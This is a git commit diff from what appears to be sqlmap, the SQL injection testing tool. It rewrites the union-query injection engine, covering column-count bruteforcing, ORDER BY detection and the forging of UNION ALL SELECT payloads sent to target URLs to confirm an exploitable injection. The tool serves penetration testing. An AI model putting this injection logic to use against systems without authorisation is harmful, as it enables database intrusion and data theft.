Finally a proper union query SQL injection test engine for --union-test. It does much more requests, but for god sake now it works well!

This commit is contained in:
Bernardo Damele 2010-11-18 17:55:43 +00:00
parent 544327379f
commit 4a9bd3a240
4 changed files with 75 additions and 100 deletions

View File

@ -425,7 +425,7 @@ class Agent:
return concatenatedQuery return concatenatedQuery
def forgeInbandQuery(self, query, exprPosition=None, nullChar="NULL"): def forgeInbandQuery(self, query, exprPosition=None, nullChar="NULL", count=None, comment=None):
""" """
Take in input an query (pseudo query) string and return its Take in input an query (pseudo query) string and return its
processed UNION ALL SELECT query. processed UNION ALL SELECT query.
@ -456,6 +456,12 @@ class Agent:
@rtype: C{str} @rtype: C{str}
""" """
if count is None:
count = kb.unionCount
if comment is None:
comment = kb.unionComment
inbandQuery = self.prefixQuery("UNION ALL SELECT ") inbandQuery = self.prefixQuery("UNION ALL SELECT ")
if query.startswith("TOP"): if query.startswith("TOP"):
@ -475,7 +481,7 @@ class Agent:
if kb.dbms == DBMS.ORACLE and inbandQuery.endswith(" FROM DUAL"): if kb.dbms == DBMS.ORACLE and inbandQuery.endswith(" FROM DUAL"):
inbandQuery = inbandQuery[:-len(" FROM DUAL")] inbandQuery = inbandQuery[:-len(" FROM DUAL")]
for element in range(kb.unionCount): for element in range(count):
if element > 0: if element > 0:
inbandQuery += ", " inbandQuery += ", "
@ -499,7 +505,7 @@ class Agent:
if intoRegExp: if intoRegExp:
inbandQuery += intoRegExp inbandQuery += intoRegExp
inbandQuery = self.suffixQuery(inbandQuery, kb.unionComment) inbandQuery = self.suffixQuery(inbandQuery, comment)
return inbandQuery return inbandQuery

View File

@ -219,26 +219,32 @@ def setUnion(comment=None, count=None, position=None, negative=False, falseCond=
@type position: C{str} @type position: C{str}
""" """
if comment and count: if comment:
condition = ( condition = (
not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
( not kb.resumedQueries[conf.url].has_key("Union comment") not kb.resumedQueries[conf.url].has_key("Union comment") )
or not kb.resumedQueries[conf.url].has_key("Union count")
) )
) )
if condition: if condition:
dataToSessionFile("[%s][%s][%s][Union comment][%s]\n" % (conf.url, kb.injPlace, safeFormatString(conf.parameters[kb.injPlace]), safeFormatString(comment))) dataToSessionFile("[%s][%s][%s][Union comment][%s]\n" % (conf.url, kb.injPlace, safeFormatString(conf.parameters[kb.injPlace]), safeFormatString(comment)))
dataToSessionFile("[%s][%s][%s][Union count][%s]\n" % (conf.url, kb.injPlace, safeFormatString(conf.parameters[kb.injPlace]), count))
kb.unionComment = comment kb.unionComment = comment
if count:
condition = (
not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
not kb.resumedQueries[conf.url].has_key("Union count") )
)
if condition:
dataToSessionFile("[%s][%s][%s][Union count][%d]\n" % (conf.url, kb.injPlace, safeFormatString(conf.parameters[kb.injPlace]), count))
kb.unionCount = count kb.unionCount = count
if position is not None: if position is not None:
condition = ( condition = (
not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
( not kb.resumedQueries[conf.url].has_key("Union position") not kb.resumedQueries[conf.url].has_key("Union position") )
) )
) )
if condition: if condition:
@ -485,15 +491,13 @@ def resumeConfKb(expression, url, value):
elif expression == "Union negative" and url == conf.url: elif expression == "Union negative" and url == conf.url:
kb.unionNegative = True if value[:-1] == "Yes" else False kb.unionNegative = True if value[:-1] == "Yes" else False
logMsg = "resuming union negative " logMsg = "resuming union negative from session file"
logMsg += "%s from session file" % kb.unionPosition
logger.info(logMsg) logger.info(logMsg)
elif expression == "Union false condition" and url == conf.url: elif expression == "Union false condition" and url == conf.url:
kb.unionFalseCond = True if value[:-1] == "Yes" else False kb.unionFalseCond = True if value[:-1] == "Yes" else False
logMsg = "resuming union false condition " logMsg = "resuming union false condition from session file"
logMsg += "%s from session file" % kb.unionPosition
logger.info(logMsg) logger.info(logMsg)
elif expression == "Union payload" and url == conf.url: elif expression == "Union payload" and url == conf.url:

View File

@ -19,35 +19,23 @@ from lib.core.unescaper import unescaper
from lib.parse.html import htmlParser from lib.parse.html import htmlParser
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
def __unionPosition(negative=False, falseCond=False): def __unionPosition(negative=False, falseCond=False, count=None, comment=None):
validPayload = None validPayload = None
if negative or falseCond: if count is None:
negLogMsg = "partial (single entry)" count = kb.unionCount
else:
negLogMsg = "full"
infoMsg = "confirming %s inband sql injection on parameter " % negLogMsg
infoMsg += "'%s'" % kb.injParameter
if negative:
infoMsg += " with negative parameter value"
elif falseCond:
infoMsg += " by appending a false condition after the parameter value"
logger.info(infoMsg)
# For each column of the table (# of NULL) perform a request using # For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target url is # the UNION ALL SELECT statement to test it the target url is
# affected by an exploitable inband SQL injection vulnerability # affected by an exploitable inband SQL injection vulnerability
for exprPosition in range(0, kb.unionCount): for exprPosition in range(0, count):
# Prepare expression with delimiters # Prepare expression with delimiters
randQuery = randomStr() randQuery = randomStr()
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.unescape(randQueryProcessed) randQueryUnescaped = unescaper.unescape(randQueryProcessed)
# Forge the inband SQL injection request # Forge the inband SQL injection request
query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition) query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition, count=count, comment=comment)
payload = agent.payload(newValue=query, negative=negative, falseCond=falseCond) payload = agent.payload(newValue=query, negative=negative, falseCond=falseCond)
# Perform the request # Perform the request
@ -59,66 +47,59 @@ def __unionPosition(negative=False, falseCond=False):
break break
if isinstance(kb.unionPosition, int):
infoMsg = "the target url is affected by an exploitable "
infoMsg += "%s inband sql injection vulnerability " % negLogMsg
infoMsg += "on parameter '%s'" % kb.injParameter
logger.info(infoMsg)
else:
warnMsg = "the target url is not affected by an exploitable "
warnMsg += "%s inband sql injection vulnerability " % negLogMsg
warnMsg += "on parameter '%s'" % kb.injParameter
if negLogMsg == "partial":
warnMsg += ", sqlmap will retrieve the query output "
warnMsg += "through blind sql injection technique"
logger.warn(warnMsg)
return validPayload return validPayload
def __unionConfirm(negative=False, falseCond=False): def __unionConfirm(count=None, comment=None):
validPayload = None validPayload = None
# Confirm the inband SQL injection and get the exact column # Confirm the inband SQL injection and get the exact column
# position which can be used to extract data # position which can be used to extract data
if not isinstance(kb.unionPosition, int): if not isinstance(kb.unionPosition, int):
validPayload = __unionPosition(negative=negative, falseCond=falseCond) debugMsg = "testing full inband with %s columns" % count
logger.debug(debugMsg)
validPayload = __unionPosition(count=count, comment=comment)
# Assure that the above function found the exploitable full inband # Assure that the above function found the exploitable full inband
# SQL injection position # SQL injection position
if not isinstance(kb.unionPosition, int): if not isinstance(kb.unionPosition, int):
validPayload = __unionPosition(negative=True) debugMsg = "testing single-entry inband value with %s columns" % count
logger.debug(debugMsg)
validPayload = __unionPosition(negative=True, count=count, comment=comment)
# Assure that the above function found the exploitable partial # Assure that the above function found the exploitable partial
# (single entry) inband SQL injection position with negative # (single entry) inband SQL injection position with negative
# parameter validPayload # parameter validPayload
if not isinstance(kb.unionPosition, int): if not isinstance(kb.unionPosition, int):
validPayload = __unionPosition(falseCond=True) # NOTE: disable false condition for the time being, in the
# end it produces the same as prepending the original
# parameter value with a minus (negative)
#validPayload = __unionPosition(falseCond=True, count=count, comment=comment)
#
# Assure that the above function found the exploitable partial # Assure that the above function found the exploitable partial
# (single entry) inband SQL injection position by appending # (single entry) inband SQL injection position by appending
# a false condition after the parameter validPayload # a false condition after the parameter validPayload
if not isinstance(kb.unionPosition, int): #if not isinstance(kb.unionPosition, int):
return # return None
else: #else:
setUnion(falseCond=True) # setUnion(falseCond=True)
return None
else: else:
setUnion(negative=True) setUnion(negative=True)
return validPayload return validPayload
def __unionTestByNULLBruteforce(comment, negative=False, falseCond=False): def __unionTestByNULLBruteforce(comment):
""" """
This method tests if the target url is affected by an inband This method tests if the target url is affected by an inband
SQL injection vulnerability. The test is done up to 50 columns SQL injection vulnerability. The test is done up to 50 columns
on the target database table on the target database table
""" """
columns = None query = agent.prefixQuery("UNION ALL SELECT NULL")
query = agent.prefixQuery("UNION ALL SELECT NULL")
for count in range(0, conf.uCols+1): for count in range(1, conf.uCols+1):
if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"): if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"):
query = query[:-len(" FROM DUAL")] query = query[:-len(" FROM DUAL")]
@ -128,19 +109,16 @@ def __unionTestByNULLBruteforce(comment, negative=False, falseCond=False):
if kb.dbms == DBMS.ORACLE: if kb.dbms == DBMS.ORACLE:
query += " FROM DUAL" query += " FROM DUAL"
commentedQuery = agent.suffixQuery(query, comment) validPayload = __unionConfirm(count, comment)
payload = agent.payload(newValue=commentedQuery, negative=negative, falseCond=falseCond)
test, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
if test or seqMatcher >= 0.6:
columns = count + 1
if validPayload:
setUnion(count=count)
break break
return columns return validPayload
def __unionTestByOrderBy(comment, negative=False, falseCond=False): def __unionTestByOrderBy(comment):
columns = None columns = None
prevPayload = "" prevPayload = ""
for count in range(1, conf.uCols+2): for count in range(1, conf.uCols+2):
@ -151,6 +129,7 @@ def __unionTestByOrderBy(comment, negative=False, falseCond=False):
if seqMatcher >= 0.6: if seqMatcher >= 0.6:
columns = count columns = count
setUnion(count=count)
elif columns: elif columns:
break break
@ -158,16 +137,6 @@ def __unionTestByOrderBy(comment, negative=False, falseCond=False):
return columns return columns
def __unionTestAll(comment="", negative=False, falseCond=False):
columns = None
if conf.uTech == "orderby":
columns = __unionTestByOrderBy(comment, negative=negative, falseCond=falseCond)
else:
columns = __unionTestByNULLBruteforce(comment, negative=negative, falseCond=falseCond)
return columns
def unionTest(): def unionTest():
""" """
This method tests if the target url is affected by an inband This method tests if the target url is affected by an inband
@ -190,32 +159,28 @@ def unionTest():
logger.info(infoMsg) logger.info(infoMsg)
validPayload = None validPayload = None
columns = None
negative = False
falseCond = False
for comment in (queries[kb.dbms].comment.query, ""): for comment in (queries[kb.dbms].comment.query, ""):
columns = __unionTestAll(comment) if conf.uTech == "orderby":
validPayload = __unionTestByOrderBy(comment)
else:
validPayload = __unionTestByNULLBruteforce(comment)
if not columns: if validPayload:
negative = True setUnion(comment=comment)
columns = __unionTestAll(comment, negative=negative)
if not columns:
falseCond = True
columns = __unionTestAll(comment, falseCond=falseCond)
if columns:
setUnion(comment=comment, count=columns, negative=negative, falseCond=falseCond)
break break
if kb.unionCount: if isinstance(kb.unionPosition, int):
validPayload = __unionConfirm(negative=negative, falseCond=falseCond) infoMsg = "the target url is affected by an exploitable "
infoMsg += "inband sql injection vulnerability "
infoMsg += "on parameter '%s' with %d columns" % (kb.injParameter, kb.unionCount)
logger.info(infoMsg)
else: else:
warnMsg = "the target url is not affected by an " infoMsg = "the target url is not affected by an exploitable "
warnMsg += "inband sql injection vulnerability" infoMsg += "inband sql injection vulnerability "
logger.warn(warnMsg) infoMsg += "on parameter '%s'" % kb.injParameter
logger.info(infoMsg)
validPayload = agent.removePayloadDelimiters(validPayload, False) validPayload = agent.removePayloadDelimiters(validPayload, False)
setUnion(payload=validPayload) setUnion(payload=validPayload)

View File

@ -262,8 +262,8 @@ uTech = NULL
# Maximum number of columns to test for # Maximum number of columns to test for
# Valid: integer # Valid: integer
# Default: 50 # Default: 20
uCols = 50 uCols = 20
[Fingerprint] [Fingerprint]